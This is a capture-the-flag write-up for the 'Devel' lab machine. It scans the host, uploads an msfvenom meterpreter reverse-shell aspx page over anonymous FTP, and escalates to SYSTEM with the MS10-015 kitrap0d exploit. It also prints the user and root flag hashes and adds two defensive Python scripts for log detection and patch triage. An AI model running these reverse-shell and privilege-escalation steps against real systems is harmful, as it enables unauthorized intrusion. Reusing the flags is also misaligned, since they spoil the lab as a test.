Environment:
Name: Devel
Information gathering
Scanning the target
$ nmap -sV -O -F -oA Legacy --version-light 10.10.10.5
Nmap scan report for 10.10.10.5
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 7.5
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (90%)
- From this we can see that ports 80 and 21 are open and reachable; I tried FTP and anonymous login is allowed.
Shell
Generate
msfvenom -p windows/meterpreter/reverse_tcp -f aspx -o icekam.aspx LHOST=tun0 LPORT=6664
Upload
$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put icekam.aspx
local: icekam.aspx remote: icekam.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2831 bytes sent in 0.00 secs (34.1753 MB/s)
ftp>
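The weakness this upload relies on is an anonymous FTP account that can write into the IIS web root, so the uploaded .aspx page is served and executed by the web server. The following is an added example, not part of the original write-up: it parses W3C-style FTP log lines and flags every STOR by the anonymous user, rating uploads with an IIS/ASP.NET-handled extension as high severity. The log lines are constructed for the example, and the field order is taken from the log's own #Fields: header rather than assumed.

```python
"""Flag anonymous FTP uploads of server-executable files.

Added example (not from the original write-up). The sample log is constructed
in the W3C extended format with IIS-style field names; the parser reads the
field layout from the #Fields: header so it follows whatever the server writes.
"""
from dataclasses import dataclass
from posixpath import splitext

# Extensions IIS/ASP.NET will execute or act on once they land in the web root.
EXECUTABLE_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".asax", ".config", ".dll"}

# Constructed sample log: one anonymous session uploading a web shell, plus
# benign traffic from an authenticated user and a failed upload attempt.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2017-03-18 01:10:02 10.10.14.2 - 10.10.10.5 21 USER anonymous 331
2017-03-18 01:10:02 10.10.14.2 anonymous 10.10.10.5 21 PASS *** 230
2017-03-18 01:10:05 10.10.14.2 anonymous 10.10.10.5 21 RETR /welcome.png 226
2017-03-18 01:14:11 10.10.14.2 anonymous 10.10.10.5 21 STOR /icekam.aspx 226
2017-03-18 01:15:40 10.10.14.3 babis 10.10.10.5 21 STOR /notes.txt 226
2017-03-18 01:16:02 10.10.14.2 anonymous 10.10.10.5 21 STOR /img/logo.png 226
2017-03-18 01:17:30 10.10.14.2 anonymous 10.10.10.5 21 STOR /x.ASPX 550
"""


@dataclass
class Finding:
    when: str
    client: str
    path: str
    severity: str    # "high" for executable content, "low" for any other anonymous write
    succeeded: bool  # an FTP 2xx reply means the transfer completed


def parse_w3c(text):
    """Yield one dict per data line, keyed by the names in the #Fields: header."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directive lines (#Software, #Date, ...)
        if fields is None:
            raise ValueError("data line before #Fields: header")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line; a production parser would count these
        yield dict(zip(fields, values))


def anonymous_uploads(text):
    """Return every STOR issued by the anonymous user, successful or not."""
    findings = []
    for rec in parse_w3c(text):
        if rec["cs-username"].lower() != "anonymous" or rec["cs-method"].upper() != "STOR":
            continue
        ext = splitext(rec["cs-uri-stem"])[1].lower()
        findings.append(Finding(
            when=f'{rec["date"]} {rec["time"]}',
            client=rec["c-ip"],
            path=rec["cs-uri-stem"],
            severity="high" if ext in EXECUTABLE_EXT else "low",
            succeeded=rec["sc-status"].startswith("2"),
        ))
    return findings


if __name__ == "__main__":
    for f in anonymous_uploads(SAMPLE_LOG):
        state = "completed" if f.succeeded else "failed"
        print(f"[{f.severity.upper()}] {f.when} {f.client} STOR {f.path} ({state})")
```

Any anonymous write is reported, not only the executable ones: the correct fix for this box is to remove write permission from the anonymous account (or separate the FTP root from the web root), so a low-severity finding still points at the same misconfiguration.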
Privilege escalation
Listener
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 6664 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST tun0
msf5 exploit(multi/handler) > set LPORT 6664
LPORT => 6664
msf5 exploit(multi/handler) > run
$ wget http://10.10.10.5/icekam.aspx
meterpreter >
Local exploit enumeration
meterpreter > background
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 3
SESSION => 3
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
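From a defender's side, the value of this output is the patch list it implies: every module named after a Microsoft bulletin points at an update the host is missing. The following is an added example, not the module's own code: it parses the suggester lines above (embedded as constructed input), maps each bulletin-named module to its bulletin ID, collapses duplicates such as the two MS16-075 modules, and keeps the "could not be validated" entries in their own bucket so they are reviewed rather than dropped. Modules without a bulletin in their name are listed separately.

```python
"""Turn local_exploit_suggester output into a patch-review list.

Added example (not Metasploit's code). The input below is the suggester output
from the write-up, embedded as a constant so the script runs offline.
"""
import re

SUGGESTER_OUTPUT = """\
[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
"""

# One result line: "[+] <host> - <module>: <verdict>"
RESULT_RE = re.compile(r"^\[\+\] (?P<host>\S+) - (?P<module>exploit/\S+): (?P<verdict>.*)$")
# Module basenames that start with a bulletin number, e.g. ms10_015_kitrap0d
BULLETIN_RE = re.compile(r"/ms(?P<yy>\d{2})_(?P<num>\d{3})_[^/]+$")


def bulletin_id(module):
    """'exploit/windows/local/ms10_015_kitrap0d' -> 'MS10-015'; None if no bulletin in the name."""
    m = BULLETIN_RE.search(module)
    return f"MS{m['yy']}-{m['num']}" if m else None


def parse_results(text):
    """Return (host, module, verdict) for every [+] line; [*] progress lines are skipped."""
    out = []
    for line in text.splitlines():
        m = RESULT_RE.match(line.strip())
        if m:
            out.append((m["host"], m["module"], m["verdict"]))
    return out


def triage(text):
    """Bucket bulletins by the suggester's verdict; modules without a bulletin go to no_bulletin."""
    report = {"confirmed": set(), "unvalidated": set(), "no_bulletin": set()}
    for _host, module, verdict in parse_results(text):
        bid = bulletin_id(module)
        if bid is None:
            report["no_bulletin"].add(module.rsplit("/", 1)[-1])
        elif "appears to be vulnerable" in verdict:
            report["confirmed"].add(bid)
        else:
            report["unvalidated"].add(bid)
    # A bulletin confirmed by one module should not also sit in the unvalidated bucket.
    report["unvalidated"] -= report["confirmed"]
    return {k: sorted(v) for k, v in report.items()}


if __name__ == "__main__":
    for bucket, items in triage(SUGGESTER_OUTPUT).items():
        print(f"{bucket}: {', '.join(items) or '-'}")
```

The "unvalidated" bucket is kept deliberately: the suggester only confirms what it can check from the session, so a bulletin it could not validate (MS10-015 here, which the write-up goes on to use) is still a candidate for the patch review.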
Privilege escalation
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 3
SESSION => 3
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit
[*] Started reverse TCP handler on 10.10.14.2:6664
[*] Launching notepad to host the exploit...
[+] Process 3228 launched.
flag
cd c:\
c:\>whoami
whoami
nt authority\system
c:\>
c:\>cd Users
cd Users
c:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users
18/03/2017 01:16 �� <DIR> .
18/03/2017 01:16 �� <DIR> ..
18/03/2017 01:16 �� <DIR> Administrator
17/03/2017 04:17 �� <DIR> babis
18/03/2017 01:06 �� <DIR> Classic .NET AppPool
14/07/2009 09:20 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 24.471.080.960 bytes free
c:\Users>cd babis
cd babis
c:\Users\babis>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users\babis
17/03/2017 04:17 �� <DIR> .
17/03/2017 04:17 �� <DIR> ..
17/03/2017 04:17 �� <DIR> Contacts
18/03/2017 01:14 �� <DIR> Desktop
17/03/2017 04:17 �� <DIR> Documents
17/03/2017 04:17 �� <DIR> Downloads
17/03/2017 04:17 �� <DIR> Favorites
17/03/2017 04:17 �� <DIR> Links
17/03/2017 04:17 �� <DIR> Music
17/03/2017 04:17 �� <DIR> Pictures
17/03/2017 04:17 �� <DIR> Saved Games
17/03/2017 04:17 �� <DIR> Searches
17/03/2017 04:17 �� <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 24.471.080.960 bytes free
c:\Users\babis>cd Desktop
cd Desktop
c:\Users\babis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users\babis\Desktop
18/03/2017 01:14 �� <DIR> .
18/03/2017 01:14 �� <DIR> ..
18/03/2017 01:18 �� 32 user.txt.txt
1 File(s) 32 bytes
2 Dir(s) 24.471.080.960 bytes free
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
c:\Users\babis\Desktop>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 8620-71F1
Directory of c:\Users\Administrator\Desktop
18/03/2017 01:17 �� <DIR> .
18/03/2017 01:17 �� <DIR> ..
18/03/2017 01:17 �� 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 24.471.080.960 bytes free
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a0b5041708797c4fc4728bc72b4b
c:\Users\Administrator\Desktop>
Takeaways
This box mainly exercises local exploit enumeration and is good practice for using msf.